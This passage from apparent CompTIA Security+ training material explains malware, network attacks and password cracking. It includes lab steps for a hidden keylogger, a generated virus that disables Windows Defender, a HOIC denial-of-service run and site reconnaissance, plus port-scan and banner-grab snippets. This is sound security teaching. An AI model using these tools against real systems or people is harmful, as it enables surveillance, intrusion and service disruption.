even as a keylogger tracking all user input. Sometimes tracking cookies used by
web browsers are classified as spyware, though they tend to be more limited in
capability.
Adware Malware that delivers advertisements to the infected system, either as pop-ups or
within browser or other application windows. Adware frequently has a spyware
component, even if it's just to track user activities and choose targeted ads.

Any given piece of malware might have more than one effect, and beyond that a given infected system can
have multiple malware infestations. Not only do many forms of malware compromise security and allow
additional infections, insecure user behaviors leading to one infection often lead to many in a row, until the
computer is unusable.

Note: Many of these effects aren't strictly limited to malware. Free software is often supported by
onscreen ads, software or services might track user activity for varying reasons, legitimate distributed
computing programs can resemble botnets, and backdoors can be used for troubleshooting or system
recovery purposes. As long as these features and how they'll be used are openly and honestly presented,
the software technically isn't malware. From a security perspective it might not matter: even if the
program behavior is legally and ethically sound, you should consider if it compromises overall system
security before installing it.


How malware hides


Malware can spread easily through undefended systems, and linger a long time unseen if its payload isn't
visibly damaging. Antivirus software can easily detect and remove common infections, and applications with
strong heuristic analysis features can even recognize unknown malware by reverse engineering it or just
recognizing functional similarities to known threats. While this is a big help, malware designers responded in
turn by designing malware to hide from security software, or even to attack and disable it.

Exam Objective: CompTIA SY0-501 1.1.6


Malware vs. antimalware has become a complex arms race, each side using increasingly sophisticated
methods to gain the upper hand. Many of the details are very technical, but there are a few common techniques
malware uses to evade detection.

Polymorphic malware Malware including a polymorphic engine that changes its code whenever it
spreads. Usually involving some elements of encryption and randomization, the
changes alter the malware's signature to complicate detection, but don't actually
change how the code functions.
Stealth malware Stealth viruses contain features to hide their effects from antimalware
applications. They carefully mask the modifications they make to the system,
move themselves to different file system or memory locations in order to evade
detection, or even intercept operating system calls to fool other applications into
thinking everything is working normally. Some stealth malware anchors itself so
firmly into the system that it can only be reliably detected by running antimalware
from clean media like a bootable CD. Stealth malware that attacks antimalware
applications or signatures to avoid detection is called a retrovirus.
Rootkit Named for early versions that allowed administrative "root" access to Unix-like
operating systems, rootkits later developed stealth features designed to hide them
from detection. Modern rootkits compromise boot systems and core operating
system functions to gain high-level access that can hide them from most detection
methods. They can even infect device firmware, requiring specialized equipment
to remove or rendering the device permanently unusable. Rootkits and similar
features have even been used in commercial software: even if there's no malicious
intent from the vendor, they can compromise security in other ways.

Removing well-defended malware can be a challenge. You might need to use multiple scanning and cleaning
applications, or even specialized removal tools designed for a specific piece of malware. With particularly
persistent or newly discovered attacks, the only option might be a clean reinstall of the system.

Compromised software and firmware


It's easy to think of malware as being something you're infected with from outside, and even a trojan horse
being something you only get when you carelessly download files from sketchy-looking websites, but it's
entirely possible to have a compromised system even when you've got a "clean install" of all your business-
critical software. Even apart from some critical software vulnerability or misconfiguration, there are a few
ways this could happen. Most involve either inside attackers within your organization or that of a vendor, or
else very sophisticated attacks by a state actor or highly-organized criminal group.

Exam Objective: CompTIA SY0-501 1.1.6, 1.2.2.18, 3.3.1.6


First, applications and even operating systems you install might be deliberately misconfigured or programmed
with backdoors and logic bombs. The risk is especially high in anything developed or customized specifically
for your organization, since it won't have other eyes on it aside from you like a more general-purpose
commercial or open-source project would. Even access to source code might miss some attacks. A skilled
coder can refactor, or rearrange, malicious code in ways that obfuscate its real purpose from other
programmers who don't know what to look for.


Drivers can also be compromised. While it's most dangerous when you download them from third-party sites,
manipulated drivers have been packaged on official download sites or even pre-printed CD-ROMs in the past.
One way to compromise a driver is to insert a programming shim that intercepts information passing between
the hardware and the operating system. Attached to a device like a storage drive, network adapter, or
keyboard, this could be used to harvest any sort of input and output for an attacker.
You can't even necessarily trust hardware appliances that come with factory-installed firmware, since it's
possible for a sufficiently motivated attacker with access to your supply chain to modify it. For example, a
few years ago, documents and photos were published showing NSA modification of routers and other network
equipment being shipped overseas. The NSA teams redirected equipment to secret locations, installed custom
firmware with surveillance trojan horses on it, and then sent it to its unsuspecting buyers.
Most organizations don't really have to worry about state level actors sabotaging their networks, much less
have the resources to detect and stop it. All the same, if your security needs are strict enough you can't afford
to simply trust that software is clean just because it's fresh out of the box.

Defending against malware


Protecting against malware isn't a simple task, especially when you might encounter zero-day malware that
even security experts don't know about yet. There are a number of specific techniques you should use in
combination to minimize malware exposure and limit damage.

 Ensure that all hardware and software is legitimately sourced and unaltered.
• Only download software from verified, vendor-approved sources.
• Where possible, check downloaded software against cryptographic hashes of its original contents (a minimal verification sketch follows this list).
• Use signed drivers and/or applications.
• Perform code review of custom software before deploying it.
• Make sure equipment has not been modified from its factory configuration.
 Ensure that all systems have antimalware software with real-time monitoring installed and kept up to
date.
• There are a wide variety of antivirus applications, free and commercial, with different feature sets and
capabilities. Research which best suits your organization's needs.
• The version of Windows Defender included with Windows 8 and newer includes antivirus support.
Earlier versions of Windows include a version of Windows Defender that protects against spyware but
not other forms of malware, so you'll still need another application.
• You should only run one antivirus application with real-time scanning on a given system, but you
might increase detection chances by having additional applications from other vendors for manual or
scheduled scans.
 Regulating system permissions can make it less likely for systems to become infected in the first place.
• Restricting user permissions can make it more difficult for users to install trojan horses, or for viruses
to gain the access they need to spread.
• Restricting use of removable media prevents malware from spreading on flash drives or similar
vectors. Even if such devices aren't blocked entirely, disabling auto-run features can reduce risk.
• Regularly check systems for unexpected installed applications or running processes.
 Regularly install security patches for operating systems and applications, especially browsers and their
add-ons. Frequently they are designed to fix exploits used by malware.


 Network security features can protect against malware.


• Firewalls can block the spread of worms.
• IDS and network-based antimalware can detect malware transmission.
• Spam filters can recognize harmful email attachments.
• Network monitoring software can help to spot unusual traffic caused by worms or botnets.
 Acceptable use policies and user education are among the most important tools in reducing malware
risk.
• Users should be aware of the risks of visiting unknown sites and downloading or installing untrusted
software.
• Users should be shown how to recognize phishing links and suspicious attachments.
• Unknown removable media should not be used. Flash drives are so cheap today that an attacker might
"lose" one where a valuable target might find it and wonder what's on it.
• Security software should only be disabled for a known and trusted purpose, and then only for as long
as absolutely necessary.
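
Checking a download against a published hash, as suggested in the list above, takes only a few lines. This is a minimal sketch; the file name and expected digest are placeholders to be replaced with the vendor's published values.

    # Verify a downloaded installer against a vendor-published SHA-256 value.
    # The path and expected digest below are placeholders, not real values.
    import hashlib

    def sha256_of(path, chunk_size=65536):
        digest = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(chunk_size), b""):
                digest.update(chunk)
        return digest.hexdigest()

    expected = "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"  # placeholder
    actual = sha256_of("installer.exe")                                             # placeholder path
    print("OK" if actual == expected else "WARNING: hash mismatch - do not install")

A matching hash only proves the file matches whatever the hash was published for, so the hash itself must come from a trusted channel, ideally one protected by a digital signature.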

Exercise: Examining malware


For this exercise, you'll need to use the Windows 7 VM.

WARNING: Actually running the virus at the end of this exercise will disable the VM permanently, and
you will need to reinstall it from a new copy.
In this activity you'll use a keylogger and create a virus.
Do This How & Why

1. In the Windows 7 VM, install Ultimate Keylogger.

a) In the Tools folder on the desktop, double-click ultimatekeylogger. This application secretly logs all user activity, very much like keyloggers spread by trojans and viruses. At the same time, this particular one isn't intended as malware, and won't spread to other systems on its own.

b) Follow the onscreen prompts to install the application. The application opens and a welcome window pops up.

c) Click OK. You're prompted to enter a password.

d) Enter a simple password in both boxes and click OK twice.

2. Configure the keylogger to secretly log all activity.

a) In the Monitoring Options section, set the screenshot interval to 10 seconds.


b) In the Banner section, clear Show icon in the system notification area. This will make the keylogger invisible to users, just like a malicious one would be.

c) Click Apply.

d) On the top left side, click Start Monitoring, if necessary.

e) Close the application. It looks like it's closed entirely, but the keylogger is still
running.

3. Browse to a website, such as Facebook, and try to log in using fake credentials.

4. Open Ultimate Keylogger again to view activity.

a) Press Ctrl+Alt+Shift+S. You're prompted to enter the password.

b) Enter your password and click OK. Click I Agree to close the Evaluation Version window.

c) On the upper left, click Stop Monitoring.

d) Click View Report. The report opens in your browser, containing screenshots and logged keyboard input.

5. Close all open windows. Next you'll create a simple virus.

6. Launch DELmE's Batch Virus Generator. It's in the Tools folder on the desktop. You'll need to click OK to agree with the license terms.

7. Design a virus. This application lets you create a batch-based virus. On the left
is the virus name and content. On the right are three tabs you
can use to make the virus more powerful.


a) In the Virus name field, type a suitably innocent name. "Funny screen saver", for example.

b) On the Infection tab, click Infect All .pdf files.

c) On the Payload tab, click Crash Computer.

d) On the Other Options tab, click Disable Win Defender.

e) Add other virus options if you like.

8. Click Save As .Bat and choose a folder. The default file name is the one you chose.

9. In Windows Explorer, navigate to the file. Don't actually run the file unless you're willing to restore the VM from a backup.

10. Close all open windows.


Assessment: Malware
1. A user complains that every time they open their Internet browser, it no longer goes to their preferred
home page and advertisements pop up in dialog boxes that they have to close. What is the likely cause?
Choose the best response.
 Spyware
 Trojan
 Virus
 Worm

2. A user logs into their computer and is presented with a screen showing a Department of Justice logo
indicating the computer has been locked due to the user being in violation of federal law. The screen gives
several details of the violation and indicates that the user must pay a fine of $500 within 72 hours or a
warrant will be issued for their arrest. The user cannot unlock their system. What type of malware is
likely infecting the computer? Choose the best response.
 Keylogger
 Ransomware
 Rootkit
 Trojan
 Worm

3. What kind of malware can spread through a network without any human interaction? Choose the best
response.
 Polymorphic virus
 Trojan horse
 Virus
 Worm

4. You've traced some odd network activity to malware that's infected a whole department's computers.
They're processing a distributed task using spare CPU cycles, communicating with a remote server, and
sending email to random targets. What kind of malware is it? Choose the best response.
 Botnet
 Rootkit
 Spyware
 Trojan

5. You've found a computer infected by stealth malware. The program installed itself as part of the
computer's boot process so that it can gain access to the entire operating system and hide from
antimalware software. What kind of malware is it? Choose the best response.
 Armored virus
 Backdoor
 Rootkit
 Spyware


Module D: Network attacks


The network is the most important tool of modern attackers. It's by far the easiest way to distribute malware,
and it's even a great vector for social engineering attacks. Most popular application attacks are against web
applications that wouldn't even exist without today's networks. In addition to that, many attacks are directly
against the network itself: accessing hosts or resources, disrupting network functions, or stealing data in
transit. Since many core network protocols were designed before security was a real concern, networks are
still full of vulnerabilities and subject to many attacks.
You will learn:
 How to classify network attacks
 About probing, spoofing, and redirection techniques
 About denial-of-service attacks
 About forced access and password cracking
 About eavesdropping and man-in-the-middle attacks
 About wireless network attacks

Classifying network attacks


Since network attacks are so varied and encompass so many different threats, there are a lot of ways to
categorize them. One is by the part of the CIA triad it targets. Confidentiality-violating attacks are favored by
hackers seeking to access sensitive data; integrity is targeted by those seeking to alter information, and
availability by those seeking to impair others' use of the network. Sometimes an attack or series of attacks can
target multiple components of security, at once or in sequence. For example, many exploits involve simple
attacks on integrity or availability vulnerabilities as just one step toward breaking otherwise-strong
confidentiality measures.

Exam Objective: CompTIA SY0-501 1.2.2.14, 1.6.15


Another way to categorize attacks is by the layer of the network being targeted. Some attacks target the
physical hardware or connection technologies of the network, others the mid-level protocols of network
appliances, and still others go directly for vulnerabilities in applications or host operating systems. The latter
are frequently categorized as application attacks, but even then the role of the network in allowing, and
preventing, such attacks can't be ignored.
You can also classify attacks by the specific protocols and behaviors targeted. Some protocols are insecure by
nature, so are very vulnerable to attack. Others have security features, but with particular vulnerabilities an
attacker can exploit. Often different protocols that perform similar network tasks are still similar in how they
communicate across the network, making them vulnerable to similar attacks, such as eavesdropping.

Note: Remember, this list of attack types, like any other, is only a partial explanation of the security
threats facing any system or network. No matter how much you research, a system or application might
still have zero-day vulnerabilities: weaknesses that even programmers and security vendors don't know
about and haven't countered, and which attackers might learn about first. Zero-day attacks against these
vulnerabilities pose an extreme threat, just because they can catch otherwise strong defenses entirely
unprepared.

Probes
Every network has its own set of vulnerabilities, and an efficient, determined attacker wants to know as much
as possible about them before making any serious moves. That might sound terribly obvious, but there's still a
lot to that process. Vulnerabilities can depend on a host of different factors: not only do attacks target specific

services or protocols, the specific implementation in the target network can make all the difference, especially
when it comes to more specific exploits. Operating system, application version, hardware vendor or model,
and user settings can all work together to define vulnerabilities, as can security measures, or malware
infections, in place on the network.

Exam Objective: CompTIA SY0-501 2.2.12


Most of these vulnerabilities aren't readily obvious from outside the network, or even necessarily for a casual
user on the inside. This means an attacker looking to get into a specific network will probably start with
probes—network communications that don't do any damage, but are designed to reveal the network's
structure and weaknesses. Sometimes this is pretty simple: just trying to connect to a given address with a
client application like a web browser or FTP client will not only tell you whether there's an accessible server
there, but might include other information like the vendor and version of the server application. Likewise,
eavesdropping on network traffic, even packets that don't contain sensitive information, can reveal protocol
versions and specific applications in use.

Another approach is a specialized program. One example is a port scanner, an application that sends packets
to a whole range of port numbers on a host, looking to find open ports with active services. The response will
tell the attacker what ports are listening, and potentially more about the specific service. Simple port scanners
use typical TCP or UDP packets like ordinary network communications, for example sending SYN packets or
attempting full TCP 3-way handshakes. More complex tools might use specialized or non-standard requests
that can return more information.
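
As a rough sketch of how simple a basic connect scan can be, the following Python loop attempts a TCP handshake against a short list of common ports. The target address and port list are placeholders; only scan systems you own or have written permission to test, and note that dedicated tools like nmap are far faster and more capable.

    # Minimal TCP connect scan; target and port list are placeholders.
    import socket

    target = "192.0.2.10"                      # placeholder address (TEST-NET range)
    for port in (21, 22, 23, 25, 80, 110, 143, 443, 3389):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.5)                      # don't hang on filtered ports
        try:
            if s.connect_ex((target, port)) == 0:   # 0 means the handshake completed
                print("Port", port, "is open")
        finally:
            s.close()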
Some popular attacks that utilize probing include the following:

Xmas attack The data packets used by many protocols use flags, header options that give information
about the packet's purpose or request specific recipient behavior. A packet with all flags
set is called a Christmas tree packet, because it's "all lit up" with a combination of
options normal conversation never uses. The traditional Xmas attack uses a TCP packet
with Urgent, Push, and FIN flags set. A related method uses a null packet, with no flags
set. How a remote host responds to Xmas or null scans can reveal information about its
inner workings as well as just what ports it has open. Additionally, such packets can take extra processing time, making them useful in denial-of-service attacks.
Fuzzing Similar to a Xmas attack, but inserts random or invalid data into more complex header
fields or application data inputs. In extreme cases fuzzing attacks can crash applications
or entire systems, or gain access permissions; more commonly they're a way to learn how
a service or application responds to non-standard input, enabling future attacks.
Banner grabbing Sending a routine packet to a network service, such as a connection request, and seeing
what information is returned. This might sound innocuous, but since many services
openly report their software and protocol version along with other information, an
attacker can use it to search for applications or operating systems with known exploits.
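
A banner grab like the one just described can be as simple as opening a socket and sending one routine request. This sketch assumes a placeholder web server target and permission to probe it.

    # Minimal HTTP banner grab; the target is a placeholder.
    import socket

    host, port = "192.0.2.10", 80
    s = socket.create_connection((host, port), timeout=3)
    try:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        banner = s.recv(1024).decode(errors="replace")
    finally:
        s.close()
    print(banner)   # response headers often include a Server: line with product and version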

Even probes that do no direct damage are still attacks: a successful probe compromises the network by
revealing its vulnerabilities to the attacker. They're also by nature active attacks: while some probes are hard
to distinguish from benign network traffic, others are visible to alert administrators.


Spoofing
Almost any sort of communication needs to specify not only its destination, but its point of origin, so that the
recipient knows what to expect and where to respond. Spoofing is a technique where an attacker falsifies
source information in order to facilitate an attack. Many protocols don't have any way to authenticate source
addresses, so spoofing can be pretty easy. There are several common types of spoofing.

Exam Objective: CompTIA SY0-501 1.2.2.19, 1.2.2.20

IP spoofing Alters the source IP address used to route packets on IP networks.


MAC spoofing Alters the source MAC address used to identify physical devices on local networks.
Email spoofing Alters the sender address in an email message. Frequently used in phishing or other
email attacks.
Caller ID spoofing Alters the caller identification reported in a voice telephone call. A common feature in
vishing attacks.

Sometimes spoofing is used for social engineering, for example in phishing and vishing attacks where seeing
an unfamiliar address would make the target suspicious. It's also very common for network security devices to
control traffic according to its origin, and spoofing can circumvent some of these measures.
 Wireless access points are commonly configured only to allow certain MAC addresses to connect.
MAC spoofing allows an attacker to bypass this measure—even if the WAP's replies are sent to the
spoofed address, the attacker can still read them.
 Routers and firewalls often allow or block traffic based on source IP address. An attacker can spoof the
source address to bypass these controls. A drawback of this method is that the attacker might not be
able to receive replies addressed to the forged IP, but for some attacks that isn't a problem.

Spoofing is less commonly an attack in itself than it is a tool to enable other attacks or make them more
effective. It can even be used to hide attacks from logging or monitoring: a traffic pattern that would look
suspicious coming from a single source can look perfectly innocuous when it's spread out across a number of
different senders. You'll find that spoofing of one sort or another is nearly as common in network attacks as
impersonation is in social engineering.


Redirection
In contrast with but related to spoofing, redirection techniques divert traffic from a target sender to a location
of the attacker's choosing. Reasons for redirection include:
 Sending network traffic where an attacker can eavesdrop on it
 Forcing a target to connect to a malicious site containing malware
 Tricking a target into submitting information to a phony site
 Exposing the target to other network attacks

Exam Objective: CompTIA SY0-501 1.2.2.9, 1.2.2.11, 1.2.2.12


Redirection often begins with some sort of spoofing attack used to compromise a traffic-direction component
on the network, but it can also rely on malware or other methods. Some common attacks focused on
redirection include the following:

ARP Network switches and hosts use Address Resolution Protocol (ARP) to resolve logical IP
poisoning addresses into physical MAC addresses, and store the resulting values in an ARP cache. When
attackers use spoofed ARP messages to alter that cache, they can redirect traffic addressed to a
given IP to any physical device they like. An attacker can use ARP poisoning to silently
eavesdrop, actively modify data in transit, or even just block network traffic entirely. Since
ARP only works on local network segments, ARP poisoning can generally only be performed
by inside attackers.
DNS Similar to ARP, hosts use the Domain Name Service (DNS) protocol to resolve human-
poisoning readable domain names into numeric IP addresses, and store the results in a cache. DNS uses
central DNS servers which hosts can contact. By compromising or impersonating these
servers, attackers can redirect network requests wherever they like, or block them entirely. For
instance, a poisoned DNS cache might redirect requests for popular search engines to
advertising or malware sites.
Hosts file Nearly every networked computer has a hosts file which also maps computer names into IP
alteration addresses. Most operating systems check the hosts file before the DNS cache, allowing it to
override DNS queries. This can be a legitimate tool and even enhance security, but if an
attacker alters the hosts file the result is much the same as DNS poisoning. Malware frequently
alters the hosts file on infected systems, redirecting search requests or blocking access to
security and antimalware sites (a simple tamper-check sketch follows this table).
Pharming Named as a combination of "farming" and "phishing," pharming is a popular practical
application of DNS poisoning. By compromising DNS lookups, an attacker redirects traffic for
a legitimate website to a malicious imitator. Much like in a phishing attack, victims might be
tricked into entering credentials or other sensitive data, or into downloading malware. Large-
scale pharming attacks are possible, but difficult and largely theoretical. Hosts files and DNS
servers built into consumer-grade routers are much more vulnerable.
Domain Domain names for publicly accessible sites must be registered with a domain registry. By
hijacking quickly re-registering an expired domain or compromising the account that controls it, an
attacker can redirect traffic intended for the original site to an imitator. The end result is very
much like pharming, but doesn't require DNS poisoning since it changes the "legitimate"
address of the site.
VLAN Switches often use virtual LANs (VLANs) to segment traffic both for performance and
hopping security reasons. Hosts on different VLANs can't communicate directly, even when they're
connected to the same switch. Compromising the protocols used to define and control VLANs
lets an attacker divert traffic to the wrong VLAN, exposing it to attack.
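
As a small defensive illustration of the hosts file alteration described above, the sketch below scans the local hosts file for entries that override a few well-known domains. The watched-domain list and the path handling are illustrative assumptions.

    # Flag hosts-file entries that override well-known domains; lists are illustrative.
    import platform

    WATCHED = {"www.google.com", "update.microsoft.com", "www.virustotal.com"}
    hosts_path = (r"C:\Windows\System32\drivers\etc\hosts"
                  if platform.system() == "Windows" else "/etc/hosts")

    with open(hosts_path) as f:
        for line in f:
            line = line.split("#", 1)[0].strip()     # drop comments and whitespace
            if not line:
                continue
            addr, *names = line.split()
            for name in names:
                if name.lower() in WATCHED:
                    print("Suspicious override:", name, "->", addr)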


Exercise: Probing a site


In this exercise, you'll perform simple probes on a website.
This exercise relies on online content for both Firefox and Maltego, and you will need to be prepared for both.
To complete the Firefox portion of the exercise, you need Firefox 57 or later, either on the Windows 7 VM or
on your host computer. If you are using an older version of the Windows 7 VM you may need to update
Firefox.
To complete the Maltego exercise you will need to log into the application using an online account. The
exercise gives instructions for registering a new account using a student email address, but alternatively the
instructor can create accounts for students before class.
Do This How & Why

1. In the Windows 7 VM or on your host computer, install the HackSearch Pro add-on for Firefox. This add-on gathers site information using your browser from public resources such as Google, DNS, and WHOIS databases.

a) Start Firefox.

b) Click the menu button, then Add-ons. The Add-ons Manager opens in a new tab.

c) Search for the HackSearch Pro add-on, then click Add to Firefox. If the add-on isn't compatible with your Firefox version, update Firefox and try again.

d) If prompted, restart Firefox to apply the add-on.

2. Use HackSearch Pro. Note: Never probe sites without permission.

a) Navigate to a website. Choose your own company site, or one you have permission to
examine.


b) Once the site loads, right-click on the page. A HackSearch Pro option appears in the context menu.

c) Examine the available options. You can search for internal links within the site, for referenced
subdomains, specific document types, usernames and
passwords, email addresses, and so on. You can also search for
DNS and WHOIS info on the site you're visiting.

d) Click HackSearch Pro > Within Site Search. The add-on automatically performs a Google search for indexed pages within the website. The list might include pages you can't easily navigate to from the front page of the site.

e) Click HackSearch Pro > DNS Info. The add-on displays a Robtex search showing details about the site's DNS entries, including information about location or email servers. Since it's public information, you don't need to access the site itself to view it.

f) If time allows, view other HackSearch Pro results.

g) Close all open windows. Next you'll use another reconnaissance tool.

3. Start the Kali Linux VM. You can close the Windows 7 VM if you need to conserve
memory.

4. Log in with username root and password toor.

5. Install Maltego. Maltego is a penetration testing tool, much more in depth than HackSearch Pro.


a) Click Applications > 01 - Information Gathering > Maltegoce on the dashboard.

b) Follow the onscreen instructions to You'll need to register using an email account to log in.
set up the client.

c) Accept all defaults, then click The Start a Machine window opens.
Finish.

6. Perform a scan using Maltego.

a) In the Start a Machine window, click Footprint L1, then Next.

b) Enter a domain name you have permission to scan, then click Finish. Accept any disclaimers that appear. Results might take a few minutes.

c) Examine the results. An attacker could learn about the site's network configuration
using this tool. Even if it probably won't show anything too
sensitive, it might reveal vulnerabilities or avenues of attack.

7. Close all windows.


Denial-of-service attacks
Attacks on availability are commonly called denial-of-service (DoS) attacks, because their main effect is the
denial of network services to legitimate users. Depending on the method, a DoS attack's consequences can be
temporary slowdowns, crashing of network devices or applications, or even hardware damage. Sometimes
denying service itself is the attacker's goal, either for inconvenience and disruption or as a means of extortion
against the system owner; other times, DoS is just a way to destabilize a system and leave it vulnerable to
further exploits. DoS attacks can be lengthy affairs, lasting days or weeks at a time, and even when they don't
outright crash systems the performance hit can be very disruptive to the target's regular functions.

Exam Objective: CompTIA SY0-501 1.2.2.1, 1.2.2.2, 1.2.2.10


DoS is an attack goal more so than a technique, and there are many ways to do it. The most basic is brute
force: all the attacker needs is the network resources to flood the target system with enough data or requests
that it can't respond to all of them, and the system slows to a crawl or even crashes due to resource
exhaustion. A simple method is a ping flood, sending enough ICMP ping requests that the host can't respond
to them all, and its network bandwidth or even other system resources are too strained to handle other traffic.
The same principle holds true for many other types of network requests.
The problem with a simple DoS (that is, if you're the attacker) is that it takes a lot of network resources to
implement, and it's not very hard for an alert network administrator to counter a basic DoS attack by blocking
traffic from the offending site. To generate more potent threats, attackers use amplification to make stronger
DoS attacks.
One amplification method is a distributed denial-of-service (DDoS) attack, using multiple attacking systems
in multiple locations to generate a traffic spike that will challenge even powerful targets. It's also harder to
block since it comes from many different networks. A DDoS can be a coordinated attack planned by many
malicious users; this is a common method used by hacktivists or other organized attackers. More insidiously,
the systems taking part in a DDoS aren't always willing participants: such attacks commonly use botnets of compromised hosts.


A related way to amplify the power of DoS or DDoS is by using a reflected attack: these rely on IP spoofing
to generate traffic from unrelated hosts, generally of the sort that would be harmless other than its sheer
volume. An early example was the smurf attack which was popular in the late 1990s. It's like a ping flood, but
instead of pinging the target directly, the attacker pings a large number of other systems. The trick is that
those packets all have the target's IP address forged as their source, so when the other systems think they're
replying to the originating host's IP, they're actually flooding the victim with a DDoS attack.
Network administrators responded to frequent smurf attacks by configuring many servers and routers not to
respond to or forward external ping packets, so they're not nearly as popular or effective as they used to be.
Since then, new reflected attacks have surfaced, targeting more critical services like DNS or NTP. These can
be potent attack amplifiers, and difficult to block without restricting important network functions.


DoS variants
Traditional DDoS and reflected attacks bombard targets with large amounts of fairly normal traffic. Other
DoS attacks rely on misusing protocols by sending abnormal traffic or malformed packets that confuse the
target; they either require extra system resources to process, exploit weaknesses to crash services, or even
allow malicious code to run. In some cases a single packet, like the so-called ping of death, can bring down an
entire vulnerable system. There are several avenues to this kind of protocol abuse, often used in conjunction,
and many of them are also classified as application attacks.
 Oversized packets, especially for control or message protocols that don't normally carry much data, can
confuse a host and cause undesired behavior. If the receiving application only has limited memory, or
buffer space to receive that data, a buffer overflow can cause it to crash. Worse, it could run the
overflowing data as executable code, compromising the system as a whole.
 Malformed packets containing garbage data can also cause damage, whether they're oversized or not. A
properly written host application will detect errors and discard bad data, but a vulnerable one might
crash or behave unpredictably.
 Even properly formed packets can harm a host by deliberately misusing a protocol. A SYN flood attack
abuses the TCP connection by sending a constant stream of SYN packets used to open connections, but
never responding to the returning acknowledgments from the server. The resulting half-open
connections consume system resources, eventually preventing legitimate users from connecting.

DoS attacks can also be physical, potentially rendering network devices unusable without repair: this is also
called a permanent DoS. The most obvious physical attack is someone with physical access to network
hardware damaging or destroying it. Sophisticated remote attacks can also overwrite device firmware, leaving
it bricked, or unable to boot. Other complex attacks are possible: someone who gets access to electrical or
climate control systems could cause surges or overheating that will crash or physically damage servers and
other network hardware. Less severely, someone could introduce signal interference to deliberately jam a
wireless or even wired connection.
Finally, not all DoS events are technically attacks. Unintentional, or friendly, DoS occurs when a system gets
a sudden surge of legitimate traffic it isn't prepared for, and experiences slowdowns or crashes as a result. A
common term in the late 1990s and early 2000s was slashdotting, named for the tech news site Slashdot.
There was nothing shady or malicious about Slashdot itself: it's just that the site was so popular that when it
published an article about another website, the other site would find itself flooded by curious users who read
about it on Slashdot. Sites not prepared for that level of traffic would frequently become unreachable to new
or regular users alike. The same thing happens with today's even larger social media sites: getting noticed by a
suddenly wider audience can overwhelm servers not used to heavy traffic, and harm immediate business
operations as surely as a DoS attack would.


Exercise: Simulating a DoS attack


You'll need to have Windows 7 and Windows Server 2012 running simultaneously for this exercise. In this
exercise, you'll simulate a DDoS attack against a fictitious website using High Orbit Ion Cannon. It's a simple
utility that can be used both for network stress testing or for actual DoS attacks.

Do This How & Why

1. In Windows 7, double-click hoic 2.1. It's in the Tools folder on the desktop. High Orbit Ion Cannon
opens.

2. Add a new target.

a) In HOIC, click +. The Target window opens.

b) In the URL field, type http://www.dostest.com. This isn't a real site, but for purposes of the exercise it doesn't need to be.

c) Move the Power slider to High.

d) Click Add. The site appears in the target list.

3. In Windows 2012, monitor network activity. You'll watch what happens when the attack is running.

a) Open Task Manager. You may need to click More Details to see the full interface.


b) On the Performance tab, click Ethernet. There shouldn't be much, if any, activity right now.

4. Start a DoS attack.

a) In HOIC, click FIRE TEH LAZER!

b) In Windows 2012, view network activity. The activity should increase. It still may not appear as much on a fast connection.

c) In Windows 7, click FIRE TEH LAZER! again, to stop the attack.

d) Increase Threads to 10.

e) Start the attack again. The network activity is higher this time.

5. Stop the attack and close all open windows. A single instance of this application doesn't generate very much traffic, but some real attacks have involved thousands of users.

Forced access attacks


The first thing most people think of when they hear about information security, or hacking, is the risk of an
attacker gaining access to a sensitive system to take control or get at its information. That's no misconception:
gaining the right sort of system access allows an attacker to freely compromise any part of the CIA triad, so
many attacks are based around gaining access or escalating privileges. Remember that to an attacker just
getting a foot in the door is valuable, since access to one weakly protected system lets you pivot to attack the
whole network through its internal trust relationships.
The easiest way for an attacker to bypass access controls is by choosing a target that doesn't have any. PCs
often don't even have passwords configured, or users simply leave themselves logged in whether they're at the
keyboard or not. Even when hosts are secured, network access turns an attacker from an outside threat to a
more dangerous inside one. Many careless users and administrators create Wi-Fi hotspots with no password
for the sake of convenience, and it's even more common for a wired network to be accessible to anyone who
can plug in. Even some network services and shared resources either don't use authentication, or can be
configured not to require authentication: this can allow even a remote attacker to access resources.
Assuming a system uses a password or other authentication mechanism, an attacker's most obvious option is
to get a hold of it and access the system using legitimate credentials. Obviously, this depends on the attacker
getting a hold of the credentials in the first place. For this reason, stealing passwords alone is one of the most
common goals of hackers and social engineers alike: it literally unlocks the path to anything else they might
want.


Finally, even if a strong authentication mechanism is in place, an attacker might be able to bypass it.
Backdoors and other exploits can allow system access without the normal authentication process. One
example of such an exploit is the transitive trust used by some trust models. Transitive trust means that if
Alice trusts Bob to access her system, and Bob trusts Dave, it's assumed that Alice also trusts Dave. If Chuck
comes by and wants to steal Alice's data, he doesn't need her password or even her trust: he can hack or
befriend Bob or Dave, and gain access to her system that way.
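
To see why transitive trust widens the attack surface, here is a toy Python sketch using the names from the example above. Treating trust as transitive means anyone reachable in the trust graph effectively gains access, whether or not the owner ever chose to trust them.

    # Toy model of transitive trust; names and relationships are from the example above.
    trusts = {"Alice": {"Bob"}, "Bob": {"Dave"}, "Dave": set()}

    def effective_access(owner):
        reachable, frontier = set(), list(trusts[owner])
        while frontier:
            person = frontier.pop()
            if person not in reachable:
                reachable.add(person)
                frontier.extend(trusts.get(person, ()))
        return reachable

    print(effective_access("Alice"))   # {'Bob', 'Dave'} - Dave gets access Alice never granted directly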

Password cracking
Attackers who can't steal passwords can just try to guess one, a process called password cracking. This can be
surprisingly easy. Even outside of those who pick "12345" or "football", many users will use the same
password on literally every system, site, or service they use, so learning one exposes them all. Network devices
and services often come installed with a default password, which administrators may not bother to change.
While some systems, especially online ones, will lock out users or alert administrators after a number of
failed attempts, others only apply time delays that will slow but not stop a determined attacker. Some even let
attackers keep going until they find a solution, and especially when crackers steal password-protected drives
or databases nothing keeps them from trying password after password offline until they find the one that
works. Cracking isn't just for user passwords: it can also be used on any sort of encrypted data that can be
unlocked by the proper key.

Exam Objective: CompTIA SY0-501 1.2.2.16, 1.2.4.1, 1.2.4.2, 1.2.4.3, 1.2.4.4, 1.2.4.5, 1.2.4.6
Automated tools are commonly used to speed the cracking process. Their methods aren't unlike manual ones,
just faster and more tireless.

Brute force The cracker tries every possible password in a methodical order, such as A to Z, until the
right one is found. Brute force can eventually guess any password, but it's
very slow and easily defeated by long passwords or lockout controls.
Dictionary attack The cracker uses word lists, such as literal dictionaries or lists of common passwords
downloaded from the internet. These won't easily guess random character strings, but are
very effective against passwords comprised of words or names, like many users choose
for ease of remembering. Passwords requiring combinations of letters, numbers, and
